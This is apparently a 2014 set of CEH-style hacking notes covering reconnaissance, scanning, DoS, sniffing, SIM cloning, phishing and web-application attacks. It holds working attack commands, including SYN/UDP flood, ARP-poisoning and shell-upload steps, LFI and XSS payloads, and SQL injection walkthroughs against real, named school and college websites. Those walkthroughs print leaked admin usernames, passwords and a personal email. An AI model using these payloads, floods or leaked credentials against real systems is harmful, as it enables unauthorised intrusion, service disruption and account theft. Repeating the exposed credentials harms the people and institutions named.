Hacking in shadows By - Raghav Bisht

1 | P a g e
R o o t - X S e c u r i t y
H a x a - 1 N u l l L a m b d a : X
0 1 1 0 1 0 0 1 0 0 1
0 0 0 1 1 1 0 0 0 1 1
1 2 / 3 1 / 2 0 1 4
Root-X , Shadow Walker &
Raghav
Hacking In Shadow
CEH Practical Notes

December 31,
2014
[HACKING IN SHADOW CEH PRACTICAL
NOTES]
CONTENT
 Foot-printing
 Scanning/Banner Grabbing
 Enumeration
 Google Hacking
 Information Gathering [Automated Process ]
 Dos Attack D-Dos Attacks
 IDS - IPS - Firewall - Antivirus - Honey-pots
 Mobile Hacking
 Sniffing
 Social Engineering
 Web-servers & Web-application Hacking
 System Hacking
 Malwares
 Penetration testing
 Buffer Overflow
 Wi-Fi Hacking

December 31,
2014
NOTES]
FOOTPRINTING
1. Who-is Database
 domaintools.com
 yougetsignal.com
 Sam spade [ who is tool ]
 net-Tools 5 [ Networking Tools ]
 robtex.com
2. Imp Sites
 archive.org
3. Mirroring Websites
 httrack
 IDM -->Grabber
4. Reverse IP lookup
 yougetsignal.com
 robtex.com
5. ping , netstat, nslookup, tracert CMD Commands
 ping
 ping google.com
 ping -t google.com
 ping -l 1024 google.com
 ping -n 10 google.com
 netstat
 netstat
 netstat -a
 netstat -n -o -a
 nslookup
 nslookup www.site.com
 tracert
 tracert www.site.com

December 31,
2014
NOTES]
6. Email Harvesting
Tools
 samspade
 black widow
 GSA Email Spider
 Email Extractor
 Metasploit [ Backtrack , Kali Linux ]
 msfconsole
 search gather [ Search The all Information Gathering Exploits ]
 use auxiliary/gather/search_email_collector
 set DOMAIN <domain name>
 exploit

December 31,
2014
NOTES]
Scanning & Banner Grabbing
1. Network Scanning
 IP scanning
 port scanning
Eg. first IP scanning so for IP scanning we use:
Check it out :http://120.59.128.29
I. Angry IP Scanner :
 0.0.0.0-255.255.255.255 using the concept of = ping sweep , so lets start
 Our Target : 120.59.128.1 - 120.59.128.255
 On Ports : 80,21,443,110
 lets try to open this ip on port 80 - > Its shows me ADSL Modem -> To bypass this
modem we try brute force or dictionary attack.
Eg. Top ten passwords :
admin
user
custom
manager
abc123
abc@123
password
pa55w0rd
Pa55w0Rd
admin@123
123456
passwd
admin123
user123
user@123....etc
II. Nmap/Zenmap
III. Port Scanner
IV. Network scan ( NET DISCOVER [ BT-tool ] ) :
 netdiscover -i <interface> -r <target>/24 /16 <--- subnet
 netdiscover -i etth0 -r 192.168.1.0/24

December 31,
2014
NOTES]
2. vulnerability scanning
I ]Vulnerability Scanner (Acunetix, Netsparke, Nessus, Gfi languard etc)
 Backtrack Tools
 Whatweb [ Find out web application ][ Backtrack Tool ]
 Eg: ./whatweb bytec0de.com
 zoomscan [ scan Joomla website ] [ /pentest/web/zoomscan ]
 Eg: ./zoomscan.pl -u http://liclanka.com/
 Nikto :
 Eg ./nikto.pl -host liclanka.com
 Websecurifi
 application/backtrack/exploitation tool/web exploitation tool/websecurifi
 Vega
 application/backtrack/vulnerability assessment/web application/web vulnerability
scanner/vega
 w3af
 application/backtrack/vulnerability assessment/web application/web vulnerability
scanner/w3af
 webshag
 pentest/enumeration/web/webshag [ ./webshag_gui.py ]

December 31,
2014
NOTES]

December 31,
2014
NOTES]
3. Nmap
Types Of Scans :
TYPES || Commands
1. tcp full connect scan ----> nmap -sT <target name>
2. syn half connect scan ----> nmap -sS <target name>
3. Stealth Scan ----> Used for bypassing firewalls
 xmas scan ----> nmap -sX <target name>
 null scan ----> nmap -sN <target name>
 Fin scan ----> nmap -sF <target name>
4. list scan ----> nmap -sL <list.txt>
5. udp scan ----> nmap -sU <target name>
6. ping scan ----> nmap -sP or -nP or -sn <target name>
7. ack scan ----> nmap -sA <target name>
8. window scan ----> nmap -sW <target name>
10. version scan ----> nmap -sV or -v <target name>11. timming -
11 . Timings T1,T2,T3 -----> Deep Scanning
T4,T5 -------> aggressive timing scanning.
12. quick scan -----> nmap -F <target name>
13. Intense Scan -----> nmap -T4 -A -v <target name>
14. Intense Scan + UDP ----> nmap -sS -sU -T4 -A -v <target name>
15. Intense Scan All TCP ----> nmap -p 1-65535 -T4 -A -v <target name>
16. Intense Scan no ping ----> nmap -T4 -A -v -Pn <target name>
17. Quick Scan Plus ----> nmap -sV -T4 -O -F --version-light <target
name>
18. Quick Traceroute ----> nmap -sn --traceroute < target name >
19. Slow Comprehensive scan ----> nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -
PA3389 -PU40125 -PY -g 53 --script
"default or (discovery and safe)" <target>

December 31,
2014
NOTES]
Enumeration
I. Enumerate users [ To Take Out Details About User Like ( NetBIOS Name,
Users name etc) ]
 DNS Enumeration
 robtex.com
1. dnsenum (BT)
 cd /pentest/enumeration/dns/dnsenum
 ./dnsenum.pl <target>
 ./dnsenum bytecode.in
2. dnsmap (BT)
 cd /pentest/enumeration/dns/dnsmap
 ./dnsmap bytecode.in
3. dnsrecon (BT)
 cd /pentest/enumeration/dns/dnsrecon
 ./dnsrecon.py -d bytecode.in
4. dnswalk (BT)
 cd /pentest/enumeration/dns/dnswalk
 ./dnswalk bytecode.in. <--- put dot at last
5. dnstracer (BT)
 dnstracer -v bytecode.com
6. dig (BT)
 dig
 dig A <target> -> for A record IPV4
 dig AAA <target> -> for A record IPV6
 dig MX <target> -> for MX mail exchange record
 dig NS <target>
 dig SOA <target>
 dig SRV <target>
7. fierce.pl (BT)
 fierce.pl -dns bytecode.in
8. nslookup (BT)
 BT ~ # nslookup

December 31,
2014
NOTES]
 www.checkpoint.com
 set type=mx [ MX Records ]
 checkpoint.com
 set type=ns [ NS Records ]
 checkpoint.com
9. Automating lookups
 Forward lookup brute force
 Reverse lookup brute force
 Zone transfers
 Web Crawling -> [ admin page finding ]
 IDM
 HTTRACK
 Any Vulnerability Software

December 31,
2014
NOTES]
 Nmap
 Shared folders [ my lan viewer ]
 NetBIOS Service
1. Scanning for the NetBIOS Service
 SMB4K (BT) [GUI]
 smbserverscan (BT) [GUI]
2. Enumerating Usernames
 samrdump (BT)
 BT smb-enum # ./samrdump.py 192.168.90.18

December 31,
2014
NOTES]
Google Hacking
1. http://www.googleguide.com/advanced_operators_reference.html
2. Basic Search
3. Advance Search
4. Directory Listing
 intitle:index of parent directory
5. Locating CGI-BIN [ Common Gateway Interface ]
 inurl /cgi-bin/login.cgi
6. Traffic Camera Hacking
 inurl:indexFrame Camera
 allinurl:"view/index" filetype:shtml
== Axis ==
inurl:"view/indexFrame.shtml"
inurl:"view/index.shtml"
intitle:"Live View / - AXIS"
intitle:axis camera
intitle:"axis #Kameramodell#"
== Canon ==
inurl:sample/LvAppl/
== JVC ==
intitle:"V.Networks [Motion Picture(Java)"
== EvoCam ==
intitle:"EvoCam" inurl:"webcam.html"
== WebcamXP ==
intitle:"my webcamXP server!"

December 31,
2014
NOTES]
== MOBOTIX ==
inurl:/control/userimage.html
== Panasonic ==
inurl:/ViewerFrame?Mode=Motion
== FlexWatch ==
inurl:toolam.html
inurl:viewash.html
== Toshiba ==
intitle:"TOSHIBA Network Camera - User Login"
== Sony ==
inurl:/home/homeJ.html
inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”

December 31,
2014
NOTES]
intitle:”Live View / - AXIS 206W”
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1? intext:”Open Menu”
intext:”MOBOTIX M10? intext:”Open Menu”
intext:”MOBOTIX D10? intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com

December 31,
2014
NOTES]
Information Gathering [Automated Process ]
1] Information Gathering :
> Uberharvest
> theharvester.py
> metaGooFii
> Web Data Extractors ( Email-Phone no Extractors )
> Maltego
2] People Search :
> pipl.com
> anywho.com
> address.com
> Social networking sites [ facebook,linedin,twitter ]
> Job Sites [ dice.com, monster.com,naukri.com ]
3] Phone Number
> truecaller.com
> kgdetective.com
> phunwa.com
4] Trace route Tools
> Trout [ www.foundstone.com ]
> tracert , traceroute [ commands ]
5] Email IP Tracking
> http://blasze.tk
> wspy.org
> Emailtrackerpro.com
> Readnotify.com
> Politemail.com
> www.whatismyip.com
> http://www.iptrackeronline.com

December 31,
2014
NOTES]
Dos Attack D-Dos Attacks

December 31,
2014
NOTES]
1. DOS ATTACK
It is an attempt to make a machine or network resource unavailable to its intended
users.
Consuming all resources given to person. Like Network bandwidth , All Type Of
Memory etc...
 Ping Of Death
 ping -t -l 6550 google.com [ max buffer size = 65500 ]
 ping bytecode.in -l 1460 -n 10000000 -w 1
 Effective system [ Solaris 2.4 , ninix , win3.11,95 ]
 SYN-ATTACK
 hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood [-S -> SYN, open ssh
port, syn flood on router, -a <Source address>, -S<Victim addtress>]
 UDP/HTTP/TCP Flooding
 LOIC
 HOIC
 Smurf Attack
 make your own packet and flood on network
 pktbuilder
 packETH 1.6 [ linux & windows ]
 CDP Flooding [ Cisco Discovery Protocol ]
 yersinia [ backtrack ]
 Done on Cisco Switches & Routers
 MAC Flooding [ BT ]
 Flooding network switches
 ARP Spoofing
 Net cut [ Windows ]
 ettercap [ Backtrack ]
 Deauthentication Technique
 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30
ath0
 Where:

December 31,
2014
NOTES]
-0 : means Deauthentication
1 : is the number of deauths to send (you can send multiple if
you wish); 0 means send them continuously
-a : MAC address of the access point ( Router )
-c : MAC address of the client to Deauthentication; if this is
omitted then all clients are deauthenticated
ath0 : is the interface name
2. D-Dos ATTACK
 HTTP ATTACK
 Get-Post Methods
 DNS Amplification Attack
 NTP Amplification Attack
 Slowloris Attack [ Used when , Firewall blocks your Ip address after some
requests ] [slowloris.pl ]
 slowloris.pl -dns www.site.com -timeout 1 -cache
3. IPV6 Flooding : [ RA Flood Attack]
Victim : windows user
 Advertising the IPV6 Network [ ./fake_router6 eth1 def:c0::/64 ]
 cd /pentest/spoofing/thc-ipv6
 Now flooding. [ ./flood_router6 eth1 ]
4. Scapy [ Packet manipulation tool ] Features -> capture, create, play,
reply, scan, discover.]
I. scapy -> Sending packet from scapy
 send(IP(src="192.168.1.55",dst="192.168.1.1")/ICMP()/"OurPayload") -> check with
wireshark.
 ctrd+d
II. scapy -> Creating Our Packet & Sending Packet
 L2=Ether()

December 31,
2014
NOTES]
 L3=IP()
 L4=TCP()
 L2.show()
 L2=Ether(src="01:23:45:67:89:ab")
 L3=IP(ttl=99, dst="192.168.1.1")
 del(L3.dst)
 L3.dst="192.168.1.2"
 L4=TCP(sport=6783, dport=22, flag="A")
 L4.show()
 send=sendp(L2/L3/L4) -> To send Packet
III. scapy -> Sniffing with scapy
 sniff(iface="eth0", prn=lambda x:x.show()) -> show full packet detail
 ctrl+c
 sniff(iface="eth0", prn=lambda x:x.summary()) -> do not show full packet detail
 sniff(filter="host 192.168.1.1", count=5)
 a=_
 a.nsummary()
 a[1]
5. Hping3 [ port scanning, syn, ack, ip, others host discovery, sniffer,
flooding, file transfer ]
 hping3-h "or" man hping3 [Help menu]
 hping3 -S www.lpu.in -p 80 -c 2 [ -S -> SYN Request, -c -> how many time to ping ]
 hping3 -S 192.168.1.38 -p ++50 -c 5 [++50 port start with 50,51,52,53]
 hping3 -1 192.168.1.x --rand-dest -I eth0 [-1-> ICMP , Ping all possible ip address in
random order ]
 hping3 -1 192.168.1.1 --icmp-ts -c 2 [Check time stamp ]
 hping3 -8 50-56 -S 8.8.8.8 [-8 -> Scaning, 50-56 -> Port, 8.8.8.8 -> google dns server]
 hping -2 192.168.1.6 -p 80 -c 1 [-2 -> udp]
 hping3 -F -P -U 192.168.1.38 -c 3 [-F -> FIN, -P -> PUSH, -U -> URGENT] [X-Mas
Scan]
 hping3 192.168.1.38 -Q -P 139 - s [-Q -> Sequence number]
 hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood [-S -> SYN, open ssh port, syn
flood on router, -a <Source address>, -S<Victim addtress>]
 hping3 –rand-source targetIPadress –flood -S -L 0 -p 80
 hping3 -2 www.lpu.in -p ++44444 -T -n [Trace Route using UDP] [ctrl+z -> If doesn't
respond ]
 hping3 -S www.lpu.in -p 53 -T [Trace Route using TCP]

December 31,
2014
NOTES]
NOTE : hping3 also work as hping interpreter & scapy.
 hping3
 hping send
"ip(saddr=192.168.1.55,daddr=192.168.1.38,ttl=15)+tcp(sport=6783,dport=80,flags=s)"
6. CDP - Flooding [ Cisco Discovery Protocol ] [CPU Damaging
Routers & Switches]
 yersinia -G
 Launch attack
 CDP
 flood CDP table
 ok
 List attacks
 cancel all attacks
7. HTTP Flood Attack
 ApacheBench [Tool BT]
 ab -c 1000 -n 10000 http://youripaddress/
8. UDP Flood Attack
 hping3 -flood-rand-source -udp -p 53 YourtargetIPaddress
*9. SYN FloodAttack
 hping3 -rand-source targetIPadress -flood -S -L 0 -p 80

December 31,
2014
NOTES]
NOTE : Slowlowris.pl

December 31,
2014
NOTES]
IDS - IPS - Firewall - Antivirus - Honeypots
1. Firewall
I. Windows Firewall [ netsh ]
 netsh /?
 netsh lan /?
 help
 firewall
 help
 netsh firewall set portopening tcp 445 smb enable --> To open port in my system
 TCP/IP troubleshooting and interface resets :
 Install the TCP/IP protocol- netsh int ipv4 install
 Uninstall the TCP/IP protocol- netsh int ipv4 uninstall
 Configure the Windows Advanced Firewall :
 Show all firewall rules
 netsh advfirewall firewall show rule name=all
 Delete an inbound advanced firewall rule for port 21
 netsh advfirewall firewall delete name rule name=all protocol=tcp
localport=21
 Export Windows Advanced Firewall settings -
 netsh advfirewall export “c:advfirewall.wfw”
Perhaps the most common command you might use is the command to enable or
disable your Windows firewall, like this:
 netsh firewall set opmode disable
 netsh firewall set opmode enable
1. To deny all incoming connections and allow all outgoing connections :
 netsh advfirewall set all profiles firewall policy block inbound, allow
outbound
2. To enable firewall:
 netsh advfirewall set all profiles state on
 netsh firewall set opmode enable

December 31,
2014
NOTES]
3. To disable firewall:
 netsh advfirewall set all profiles state off
 netsh firewall set opmode disable
4. Allow or Deny rules
 To add a rule allowing tcp or udp incoming packets on port 80:
 netsh advfirewall firewall add rule name="HTTP"
 protocol=TCP localport=80 action=allow dir=IN
 protocol=UDP localport=80 action=allow dir=IN
 To deny tcp or udp packets on port x:
 protocol=TCP localport=80 action=block dir=IN
 protocol=UDP localport=80 action=block dir=IN
5. Delete a rule
 To delete a rule issue the following command:
 netsh advfirewall firewall delete rule name="HTTP"
6. Allow or deny
incoming connection for specific port and IP
 To allow from specific ip:
 protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x
 To deny from specific ip:
 protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x
 Allow or deny a subnet
 protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x/24

December 31,
2014
NOTES]
or
 protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x-x.x.x.x
or
 protocol=TCP localport=80 action=block dir=IN remoteip=localsubnet
2. Linux Firewall [ Iptables ]
 IP Address Blocking
 iptables -A INPUT -s <Ip Address> -j DROP
 iptables -A INPUT -s <Ip Address> -p tcp --destination-port 80 -j DROP
 iptables -A INPUT -s <Ip Address> -p tcp --destination-port 443 -j DROP
 sudo ufw deny from $ip
 IP Address Allowing
 iptables -D INPUT -s <Ip Address> -j DROP
 sudo ufw allow from <Ip Address>
2. Honeypot
 Net Tools
 Hack Trapper

December 31,
2014
NOTES]
 Honeybot
 Port Scan Attack Detector

December 31,
2014
NOTES]
Mobile Hacking
1. SIM Cloning
SIM - Subscriber identity module
IMSI - International mobile subscriber identity
IMEI - International Mobile Station Equipment Identity
Esn - Electronic serial number
MIN - Mobile identification number
 CDMA Sim Cloning :
1. check for usb drivers
2. attach usb
3. check for port "right click on my computer > manage > device manager > ports"
4. open cdma workshop 2.7.0 set the port > press read.[ All detail of phone will be saved
]
5. give back the victim phone to him.
7. attach reliance netconnect (http://kollam.olx.in/reliance-netconnect-zte-880-cdma-1x-
iid-449181852)
> http://www.priceindia.org/broadband/reliance/zte-mg-880-data-card-price/
8. again see port.
9. open CDMA workshop v2.7.0 --> set port
10. write all sim details on zte-mg-880-data-card

December 31,
2014
NOTES]
2. Android Rooting

December 31,
2014
NOTES]
Useful Apps :
 FX File Explorer Plus v2.3.1.7 ROOT + All Add-Ons
 Root Explorer v3.1.7 for Android 2.3 & 3.0+
 SD Maid Pro v3.0.2.8 ROOT + Unlocker
 SuperSU v1.93 + SuperSU Pro Key
 Lucky Patcher v4.3.1.apk
 SRSRoot v4.7 Android SRS RootSuperSU v1.93
 Root.Explorer.v2.7
 SuperSU Pro Key v1.00 ROOT FULL Android
How to root your...
 HTC One (M8)
 Unlock your bootloader via HTCdev.com
 Download and install TWRP for the M8 from
http://teamw.in/project/twrp2/225
 Flash the SuperSU root zip from http://forum.xda-
developers.com/showthread.php?t=1538053
 Samsung Galaxy S5
 Download the Odin fl ash utility from http://forum.xda-
 Download the CF-Auto-Root package from http://forum.xda-
 Extract the TAR fi le from the CF-Auto-Root zip Select the TAR fi le as
type PDA in Odin, and fl ash with your device in download mode (power
on with home and volume down held)
 Sony Xperia Z2
 Unlock the bootloader of your device: http://forum.xda-developers.com/
showthread.php?t=2440597
 Download ClockworkMod Recovery from http://forum.xda-developers.
com/showthreadphp?t=2702001 and flash using fastboot
 Reboot to recovery and fl ash the SuperSU root zip from
http://forum.xda-developers.com/showthreadphp?t=1538053

December 31,
2014
NOTES]
3. Jail breaking IOS APPLE
 Jailbreak 7, 7.0.3, 7.0.4 untethered for iPhone 5s, 5c, 5, iPad and iPod touch
(Guide)
STEP 1: Download Evasi0n7 for Mac OS X/Windows. *new version here*
STEP 2: Download your iOS 7.x.x from our download page.
STEP 3: Make sure to backup all your data on your iPhone using iTunes or iCloud before using
Evasi0n7 untethered jailbreak.
STEP 4: Launch Evasi0n7 and plug in your device to the computer then click on "Jailbreak"
button.
STEP 5: Now Evasi0n7 will start the jailbreak process, so sit back and enjoy.
STEP 6: Evasi0n7 will reboot your device.
STEP 7: After done, an app of Evasi0n7 will appear on your iPhone's homescreen. Tap on it.
STEP 8: Your device will be rebooted again.
STEP 9: Evasi0n7 will continue processing your jailbreak and will reboot your iPhone for
several times until the jailbreak is done.
STEP 8: And you are ready to go.
SOURCE : http://www.redsn0w.us/2013/12/jailbreak-7-703-704-untethered-for.html
Supported Devices :
For both Mac OS X and Windows, you can now jailbreak your iOS 7.x device with one-click
Evasi0n7 jailbreak tool.
Jailbreak devices:
iPhone 5s
iPhone 5c
iPhone 5
iPhone 4S
iPhone 4
iPad 2
iPad 3
iPad 4
iPad Air
iPad mini
iPad mini 2
iPod touch 5

December 31,
2014
NOTES]
4. Smartphone Pentest Framework Master
Link : https://github.com/georgiaw/Smartphone-Pentest-Framework

December 31,
2014
NOTES]
Sniffing
1. Man In The Middle Attack Using Ettercap.
Tools :
1] whireshark
2] ettercap
3] cain & able
1] Ettercap:
> vi /etc/etter.conf
> Put : eu_uid = 0
> Put : eu_gid = 0
> Come to linux and enable the iptables rule . ( Remove # )
> ettercap -G [ To open ettercap in graphical mode ]
> sniff / unified sniff / choose interface
> Hosts / scann for host / Host list
> add router ip to target 1 & rest r victims to target 2
> MITM / arp pois
> Start Sniff
2] Wireshark:
> open wireshark
> start sniff
> Filters protocols [ http,ftp,smtp etc ] => http://wiki.wireshark.org/DisplayFilters
> http.request.method == "POST"
> tcp.port eq 25 or icmp
> ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
> tcp.window_size == 0 && tcp.flags.reset != 1
> smb || nbns || dcerpc || nbss || dns
> ip.addr == 10.43.54.65
> ip.addr != 10.43.54.65
NOTE : Analyzing Traffic Using Wireshark

December 31,
2014
NOTES]
Step1 : Open Wireshark
Step2 : Choose Interface and Start Sniffing

December 31,
2014
NOTES]
Step3 : Filtering Protocols
Step4 : Follow the tcp stream

December 31,
2014
NOTES]
Step5: Check the Header

December 31,
2014
NOTES]
3. Man In The Middle Attack Using xplico :
Tools Need
1. Ettercap
2. Xplico
Victim Info :
Victim -> 192.168.1.21
arp -a -> aa-aa-aa-aa-aa-aa
gateway > 192.168.1.1
apt-get update
apt-get upgrade
1. ettercap -G
> sniff
> unified sniffing
> select interface
> host
> scan for host
> Host list
> default gateway add to target 1
> .21 <victim> add to target 2
> Mitm
> arp poisoning
> ok
2. In terminal -> IP Forwarding # echo 1 > /proc/sys/net/ipv4/ip_forward
3. Backtrack > Forensics > Network Forensics > xplico web gui
> http://localhost:9876/
> u : xplico P: xplico
> case
> Live acquistion
> case name : Anything > Create
> Click on your case Eg. anything
> New Session
> Session Name : xyz
> click on session xyz
> At Live :
> Interface

December 31,
2014
NOTES]
> lo, et0, wlan0 ...Etc
NOTE : If victim is doing net all its session will be saved by xplico.
4. driftnet –I eth0
5. Session Hijacking
Tokens = 128-256 bit AES cipher
1. Cookies
> wireshark filter : http.cookie contains "datr"
> http.cookie && ip.src==<Target ip> -----> Check For : 1012 GET / HTTP/1.1
2. <SCRIPT>alert(document.cookie);</SCRIPT> [XSS - Vulnerability]
3. Fiddler
Step 1 : Open Fiddler

December 31,
2014
NOTES]
Step 2 : Tick the https Decryption Check Box
Step 3 : Take Your Victim Traffic

December 31,
2014
NOTES]
Step 4 : Take Out Your Victim Cookies
Step 5 : Attacker replace them with help Cookies Editor on firefox.

December 31,
2014
NOTES]
Social Engineering
1. Human Based
2. Computer Based
1. Human Based :
> There is no patch to human stupidity.
> Social Eng is the human side of breaking into a corporate network.
1. Posing as legitimate end user.
> Give identity and asks for the sensitive information.
2. Posing as Important user.
> as VIP, CFO, CEO etc
3. Posing as Technical Support.
> calls as technical support staff and request id & password
4. Eavesdropping
> or unauthorized listening of conversation or reading of
messages.
5. Sholder Surfing
> Looking over your sholder as you enter a password
6. Dumpster Diving
> Search for sensitive information at target company's.
> Trash-bins
> printer trash bins
> sticky notes
> phone bills
> contact information
> financial information
7. Tailgating
> An unauthorized person, wearing a fake ID badge enter
secured area by closely following an authorized person through a door
requiring key access.
8. Piggybacking
> I forgot my ID badge at home. Please help me.

December 31,
2014
NOTES]
2. Computer Based Social Engineering :
> Mail / attachments
> Trojens
> Keyloggers
> Pop-up Windows
> Phishing
> Hoaxes and chain letters
> Websites / Sweepstakes
> Spam mails
Eg. Phishing
Step1 : Creating Fake Facebook page.
Step2 : Save This page Source Code In Notepad

December 31,
2014
NOTES]
Step 3 : Find " login.php?login_attempt=1 "

December 31,
2014
NOTES]
2. Tabnapping

December 31,
2014
NOTES]
Web-servers & Web-application
Hacking
1] SQL Injection
2] Exploiting Hidden Elements [Tool : web developer addon]
> To manuplating html elements, tags,Forms etc on website.
> Eg: woodlandworldwide.com [vanulable site]
3] PHP Discloser
> look for vanurable site like
[http://hrithikrules.com/displayArt.php?fname=filmography/krrish2/permission.txt&dirname=ma
in]
> now [ http://hrithikrules.com/displayArt.php?fname=index.php]
4] XSS [Cross Site Scripting] [put JS query to search box, URLS etc]
> http://www.hrithikrules.com/ [Put the JS to his search box it will redirectu]
> <script>alert("hacked")</script>
--------> Beef [Tool] [Backtrack] [start server and attach your link to your xss iframe scrpt and
sentd it to other user in lan]
--------> Download beef -> upload it to free hosting site -> get your link ->attach to xxs ---> send
any where in world.
> <script iframe src=http://www.world4free.in></script>
4.1] XSS Shell
5] Lfi / Rfi [File inclusion] [Tool : wAppex]
>http://www.hrithikrules.com/displayArt.php?fname=filmography/mohenjodaro/research
.txt&dirname=main
>http://www.hrithikrules.com/displayArt.php?fname=../../../../../../../../../../../../../../etc/pass
wd
6] DNN Portal Hacking
7] Shell Uploading
> Do sql injection first find admin password for server.

December 31,
2014
NOTES]
> now open his website find any page whick upload some things [ multimedia uploading
]
> upload your shell [ .php,.aspx,.asp,.jsp ]
NOTE : some time directly shell are not uploade so rename there extention to any other filetype
and run " Tamper Data Firefox addon "
while uploading shell. remove your extantion while uploading.
> eg : http://www.arenamultimedia.in/news.aspx?id=news
===========================================================
1. Sql Injection :
www.mags.edu.in/aboutus.php?id=2
www.mags.edu.in/aboutus.php?id=2' |<--Error
www.mags.edu.in/aboutus.php?id=2 order by 1 |<--No Error
www.mags.edu.in/aboutus.php?id=2 order by 100 |<--Error
www.mags.edu.in/aboutus.php?id=2 order by 10 |<--Error
www.mags.edu.in/aboutus.php?id=2 order by 2 |<--Error + page content
SO, Directly find the vulnerable column...
www.mags.edu.in/aboutus.php?id=2 union select 1 |<--Show Nothing
www.mags.edu.in/aboutus.php?id=-2 union select 1 |<--Vulnerable column is = 1
www.mags.edu.in/aboutus.php?id=-2 union select 1,2 |<--Error
Now,
1. Find Version Of Database.
> www.mags.edu.in/aboutus.php?id=-2 union select @@version | 5.0.96-log
2. Find Database Name
> www.mags.edu.in/aboutus.php?id=-2 union select database() | magschool
3. To Find Numbers Of Tables In Database
www.mags.edu.in/aboutus.php?id=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=database()
amaps_admin, -----> 0x616d6170735f61646d696e
campusphotos, categories, celebration, contentmanagement, courses, domains, engineering,
events

December 31,
2014
NOTES]
,facilities,faculty,medmain,news,pending,query_log,register_form,site_category,sit
es,temp
4. To Find Number of Columns In Table
www.mags.edu.in/aboutus.php?id=-2 union select group_concat(column_name) from
information_schema.columns where table_name=0x616d6170735f61646d696e
adminid ,username ,password
5. To Find Username & Password :
www.mags.edu.in/aboutus.php?id=-2 union select
group_concat(adminid,0x3a,username,0x3a,password) from amaps_admin
adminid = 1
username = adminmags
password = magsmet#749$
______________________________________________________________________________
2. SQL Injection WAF Bypass
http://www.geca.ac.in/departments/hod.php?id=14
http://www.geca.ac.in/departments/hod.php?id=14'
http://www.geca.ac.in/departments/hod.php?id=14 order by 1
-----------------------------------------------------------
www.geca.ac.in/departments/hod.php?id=14 union select 1,2,3,4,5,6,7,8,9

December 31,
2014
NOTES]
Not Acceptable! | An appropriate representation of the requested resource could not be found on
this server. This error was generated by Mod_Security.
So,
www.geca.ac.in/departments/hod.php?id=14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9
www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9
Vulnerable Columns = 6,3,5
=====================================================================
www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union
select*//**/1,2,3,4,@@version,6,7,8,9
Version = 5.1.57-rel12.8-log
=====================================================================
Finding Tables :
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tabl
es*/+where+/*!table_schema*/+like+database()
about_aurangabad
admin_login
album
assignment
login
---------------------------------------------------------------------------------------------------
Finding Tables Using Limit :
14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tabl
es*/+where+/*!table_schema*/+like+database()+limit+1,1
Limit increment like -> 1,1
1,2

December 31,
2014
NOTES]
1,3
1,4
etc
admin_login --------------> 0x61646d696e5f6c6f67696e
=====================================================================
14+/**//*!12345union+select*//**/1,2,3,4,column_name,6,7,8,9+from+/*!information_schema.c
olumns*/+where+/*!table_name*/+like+0x61646d696e5f6c6f67696e
admin_id
user_name
pass_word
fname
lname
email
backpage
----------------------------------------------------------------------------------------------------
Using Limit :
14+/**//*!12345union+select*//**/1,2,3,4,column_name,6,7,8,9+from+/*!information_schema.c
olumns*/+where+/*!table_name*/+like+0x61646d696e5f6c6f67696e+limit+1,1
Limit increment like -> 1,1
1,2
1,3
1,4
etc
user_name
=====================================================================
14+/**//*!12345union+select*//**/1,2,3,4,admin_id,6,7,8,9+from+admin_login

December 31,
2014
NOTES]
admin_id = 1
---------------------------------------------------------------------------------------------------------------------
14+/**//*!12345union+select*//**/1,2,3,4,user_name,6,7,8,9+from+admin_login
user_name = admin@325
---------------------------------------------------------------------------------------------------------------------
14+/**//*!12345union+select*//**/1,2,3,4,pass_word,6,7,8,9+from+admin_login
pass_word = z9xexTqZk%+-328123z9xexTqZk%+-328123
---------------------------------------------------------------------------------------------------------------------
14+/**//*!12345union+select*//**/1,2,3,4,fname,6,7,8,9+from+admin_login
fname = shriram
---------------------------------------------------------------------------------------------------------------------
14+/**//*!12345union+select*//**/1,2,3,4,lname,6,7,8,9+from+admin_login
lname = chaudhari
---------------------------------------------------------------------------------------------------------------------
14+/**//*!12345union+select*//**/1,2,3,4,email,6,7,8,9+from+admin_login
email = shriram.chdaudhari@infogird.com
---------------------------------------------------------------------------------------------------------------------
14+/**//*!12345union+select*//**/1,2,3,4,backpage,6,7,8,9+from+admin_login
backpage =index.php
---------------------------------------------------------------------------------------------------------------------
3. Xpath Injection
http://zerofreak.blogspot.in/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html
Step 1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))--

December 31,
2014
NOTES]
Eg:
http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,vers
ion()))--
